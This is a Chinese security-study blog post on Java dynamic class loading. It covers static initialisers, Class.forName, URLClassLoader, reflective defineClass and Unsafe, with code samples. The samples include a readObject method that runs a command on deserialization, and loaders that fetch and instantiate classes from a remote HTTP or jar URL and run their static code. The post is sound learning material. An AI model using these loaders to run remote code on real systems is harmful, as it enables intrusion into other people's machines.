【JavaSec】类的动态加载初探

最新推荐文章于 2024-09-27 00:45:01 发布
最新推荐文章于 2024-09-27 00:45:01 发布
阅读量563 收藏 10
点赞数 10
分类专栏: JavaSec 文章标签: java 开发语言 网络安全 Java安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jayq1/article/details/141321012
版权

0x02 类的动态加载

文章目录

  • 什么是类加载?

即虚拟机加载.class文件

在类加载的时候会执行代码

初始化:静态代码块

实例化:构造代码块、无参构造函数

实例:

public class Person implements Serializable {
//    private transient String name;  使用transient 不会被反序列化存储
    public String name;
    private int age;


    public static int id;

    //不管调用哪种静态方法 都会调用静态代码块
    static {
        System.out.println("这是静态代码块");
    }


    public static void staticAction(){
        System.out.println("这是静态方法");
    }

    //不管调用哪种构造方法 都会调用构造代码块
    {
        System.out.println("这是构造代码块");
    }


    public Person(){
        System.out.println("这是无参Person");
    }
    public Person(String name, int age){
        this.name = name;
        this.age = age;
    }

    @Override
    public String toString(){
        return "Person{" +
                "name='" + name + '\'' +
                ", age=" + age +
                '}';
    }

    private void action(String act){
        System.out.println(act);
    }

    private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException{
        ois.defaultReadObject();
        Runtime.getRuntime().exec("calc");
    }
}

创建一个加载类:

package bli_seri;

public class LoadClassTest {
    public static void main(String[] args) throws Exception{
        new Person();
    }
}

输出:

image-20240818175224166

image-20240818175355644

image-20240818175455674

注意这里的静态代码块仅会在初始化时执行一次,因为刚刚在测试的时候 打算一次输出,但是发现只会产生一次

image-20240818180458308

动态类加载方法:

Class.forName : 可以选择是否进行初始化 注意!避坑,如果想加载的类在不同包里 一定要加上包名

初始化:

package bli_seri;

public class LoadClassTest {
    public static void main(String[] args) throws Exception{
        //初始化动态注册 方法1 
        Class c = Person.class;
        System.out.println(c);
        Class.forName(c.getName());
        
        //初始化动态注册 方法2
        Class.forName("bli_seri.Person");  //动态注册  会初始化
    }
}

image-20240818182452179

不初始化:

可控:

image-20240818182916914

image-20240818182949563

  • 类加载:

流程:

继承关系:

ClassLoader -> SecureClassLoader -> URLClassLoader -> AppClassLoader

image-20240818193815138

image-20240818194010752

image-20240818194019790

调用关系:

loaClass -> findClass(重写方法) -> defineClass(从字节码加载类)

image-20240818194047205

image-20240818194257017

image-20240818194322863

我们想根据这个底层的原理 实现对任意类进行加载

javac原理:

将源码文件.java 编译成对应的字节码文件.class

下面尝试使用URLClassLoader进行尝试

testCalc文件:

package TryLoad;

import java.io.IOException;

public class testCalc {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }

    }
}

注意小锤子是编译 生成.class

image-20240818195741071

放在指定路径下

image-20240818200043632

package bli_seri;

import java.net.URL;
import java.net.URLClassLoader;

public class LoadClassTest {
    public static void main(String[] args) throws Exception{

        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("file:///F:\\tmp\\classes\\")});
        Class<?> c = urlClassLoader.loadClass("TryLoad.testCalc");
        //初始化 加载静态代码块内容
        c.newInstance();


    }
}

一定要注意这种有包的路径问题

image-20240818212013968

执行成功

image-20240818195955839

http协议:

有一个避坑点,这个可能在真实利用的场景中没影响,就是idea对本地的url无法发起请求 但是对外部服务器可以正常执行

执行代码:

package bli_seri;

import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.nio.file.Files;
import java.nio.file.Paths;

public class LoadClassTest {
    public static void main(String[] args) throws Exception{
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("http://120.xxx.xxx.xxx:7789/")});
        
        Class<?> c = urlClassLoader.loadClass("Test");

        //初始化 加载静态代码块内容
        c.newInstance();

    }
}

文件信息: 也补充一个杀死端口进程的方法

image-20240819111019811

image-20240819110820368

jar协议:

对单独的class文件进行打包 成jar文件

image-20240819111504579

命令:jar -cvf Calc.jar Clac.class

http读取方法:

代码: 注意格式

import java.net.URL;
import java.net.URLClassLoader;

public class tryCalc {
    public static void main(String[] args) throws Exception{

        URLClassLoader urlClassLoader = new URLClassLoader(new URL[]{new URL("jar:http://120.xxx.xxx.xxx:7789/Test.jar!/")});
        Class calc = urlClassLoader.loadClass("Test");
        calc.newInstance();
    }
}

image-20240819111730156

file读取方法:

文件位置

image-20240819112049482

image-20240819112030160

  • 使用defineClass类加载 方法

//使用defineCLass
//后面是根据参数写的 defineClass(String name, byte[] b, int off, int len)
Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
defineClassMethod.setAccessible(true);
byte[] code = Files.readAllBytes(Paths.get("F:\\tmp\\classes\\Test.class"));
Class cd = (Class) defineClassMethod.invoke(cl, "Test", code, 0, code.length);
cd.newInstance();

image-20240818220056875

通用一些,因为相比于http可以做到不出网

  • Unsafe类加载

image-20240818220518251

哈皮Superman
关注
专栏目录
JavaSec】JDK动态代理初探
jayq1的博客
08-18 369
JDK动态代理初探
Javaweb安全——Java加载机制
weixin_43610673的博客
04-01 3268
前言 参照https://javasec.org/以及p神的Java安全漫谈的路线进行学习,似读书笔记那种吧。之前都是ctf遇到Java的题才学一点,像是反序列化这种,没系统化的学过Java Web安全,这次从头来好好学一遍。 Java平台版本 Java平台共分为三个主要版本Java SE(Java Platform, Standard Edition-Java平台标准版)、Java EE(Java Platform Enterprise Edition-Java平台企业版)、和Java ME(Java
java classloader_JAVA ClassLoader加载机制
weixin_39970855的博客
02-23 107
关于加载机制,结果javasec和自己的理解来记录的一篇文章!!!概念的学习首先得知道的两点:第一点:Java是一个依赖于JVM(Java虚拟机)实现的跨平台的开发语言第二点:实例化的工作流程:1、Java程序在运行前需要先编译成class文件(字节码),这个class文件其实就是我们的javac生成的!2、Java初始化的时候会调用ClassLoader对象(这里的ClassLoader...
JavaSec 基础之反序列化
akdelt的博客
03-08 377
Java 序列化是指把 Java 对象转换为字节序列的过程;Java 反序列化是指把字节序列恢复为 Java 对象的过程;
JavaSec 基础之 SQL 注入
akdelt的博客
02-22 781
in之后多个username查询时使用 # 同样会报错(因为预编译机制,系统将我们输入的字符当作了一个字符串,因此查询结果为空,不能满足业务功能需求),因此很多研发会采用${}来解决,从而造成SQL注入。编写xml文件时,Mybatis支持两种参数符号,一种是#,另一种是$。由于使用 #{} 会将对象转成字符串(因为预编译机制,系统将我们输入的字符当作了一个字符串)根据字符串排序是不生效的。Mybatis的SQL语句可以基于注解的方式写在方法上面,更多的是以xml的方式写到xml文件。
JavaSec 开源项目教程
gitblog_00027的博客
08-10 355
JavaSec 开源项目教程 JavaSeca rep for documenting my study, may be from 0 to 0.1项目地址:https://gitcode.com/gh_mirrors/ja/JavaSec 项目介绍 JavaSec 是一个专注于 Java 安全学习的开源项目,由 Y4tacker 维护。该项目旨在记录和分享 Java 安全相关的学习笔记、漏洞分...
bewhale/JavaSec漏洞靶场搭建
m0_56741167的博客
07-21 1580
搭建javasec漏洞靶场
[Java安全]加载器ClassLoader
Huamang的博客
03-30 268
前言 借用了先知社区的文章的一张图来解释这个原理 负责动态加载JavaJava虚拟机的内存空间中,用于加载系统、网络或者其他来源的文件。Java源代码通过javac编译器编译成文件,然后JVM来执行文件中的字节码来执行程序。 加载器介绍 加载器大致分为两: JVM 默认加载器 用户自定义加载加载器分 引导加载器(BootstrapClassLoader):属于jvm一部分,不继承java.lang.ClassLoader,也没有父加载器,主要负责加载核心java库(即
JavaSec 基础之 RCE
akdelt的博客
02-24 316
TOC]
JavaSec1Project4:Java pt.1项目4
04-29
在本项目"JavaSec1Project4:Java pt.1项目4"中,我们将深入探讨Java编程语言的一个实际应用,特别是关注一个名为`BookOrder`的。这个Java编程基础的重要组成部分,它代表了一个书籍订单系统的核心概念。在本...
Stakcery#JavaSec#利用TemplatesImpl执行字节码1
07-25
介绍之前首先还是要知道defineClass的利用方式,下面给出简单的代码public TouchFile() throws Exception {把它编译成字
Y4tacker#JavaSec#CommonsBeanutils1笔记1
07-25
CommonsBeanutils1笔记主要是有个比较好玩的地方在TemplatesImpl的getOutputProperties方法里面也调用了newTran
Spring Boot 学习和使用
cesske的博客
09-24 1051
Spring Boot是一款开源的Java Web应用框架,旨在简化Spring应用的初始搭建以及开发过程。Spring Boot通过整合Spring技术栈中的诸多关键组件,为开发者提供了一种快速、简便的Spring应用开发方式。它遵循“约定优于配置”的原则,通过自动配置、起步依赖和内置的Servlet容器,极大地简化了传统Spring应用的配置和部署过程。Spring Boot通过其自动化配置、起步依赖、内嵌服务器等特性,极大地简化了Spring应用的开发和部署过程。
工厂模式的介绍及实现
户伟伟的博客
09-25 108
工厂模式(Factory Pattern)是一种创建型设计模式,提供了一种创建对象的接口,而无需显式指定对象的具体。在这种模式中,我们通过定义一个工厂,专门负责生产各种型的对象,这样我们可以避免直接在代码中实例化具体,使代码更具扩展性、灵活性和维护性。解耦:客户端代码与具体的解耦,避免了对象创建逻辑的重复。简化对象创建:通过工厂统一管理对象的创建逻辑,使代码更清晰易懂。扩展性强:新增时,只需在工厂中增加创建逻辑,而不必修改现有的业务代码。
基于Hive和Hadoop的哔哩哔哩网站分析系统
最新发布
图南的博客
09-27 340
本项目是一个基于大数据技术的哔哩哔哩平台分析系统,旨在为用户提供全面的哔哩哔哩视频数据和深入的用户行为分析。系统采用 Hadoop 平台进行大规模数据存储和处理,利用 MapReduce 进行数据分析和处理,通过 Sqoop 实现数据的导入导出,以 Spark 为核心进行高效的数据处理。整个系统结合了大数据处理技术,为用户提供精准的内容推荐和深入的用户兴趣分析,帮助平台更好地了解视频趋势和用户需求。
智能BI平台项目
2302_79400545的博客
09-22 235
BI商业智能:数据可视化、报表可视化系统。
基于JavaWeb开发Java+SpringMvc+vue+element实现驾校管理系统详细设计
央顺科技官方博客
09-24 869
机遇与挑战始终并存。在开放的互联网平台面前,驾校预约管理系统的信息管理面临着巨大的挑战。传统的管理模式局限于简单数据的管理,无法适应不断变化的市场格局。在早期阶段,在将计算机技术和网络技术融入驾校预约管理系统数据管理方法之前,所有管理方式都通过人工操作完成了管理信息的。系统管理也都将通过计算机进行整体智能化操作,对于驾校预约管理系统所牵扯的管理及数据保存都是非常多的,举例像所有详细信息包括,管理员;首页、个人中心、学员管理、驾校教练管理、驾校车辆管理、预约管理、取消预约管理、驾校公告管理、系统管理。
Java Alibaba Druid 数据库连接池
miracle的专栏
09-24 734
Java开发中,数据库连接池是性能优化的重要一环。而作为一款强大的数据库连接池解决方案,凭借其和对多种数据库的支持,成为了许多企业级应用的首选。本篇文章将介绍Druid的核心特性,并结合不同数据库的实际用法。
step 3/6 : ADD ./target/ javasec-1.7 .jar app. jar lstat target/javasec-1.7.jar: no such file or directory
07-15
这个错误提示表明在当前目录下找不到名为 "target/javasec-1.7.jar" 的文件。可能是由于以下原因之一导致的问题: 1. 该文件不存在:请确保在当前目录下存在名为 "target/javasec-1.7.jar" 的文件。你可以使用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值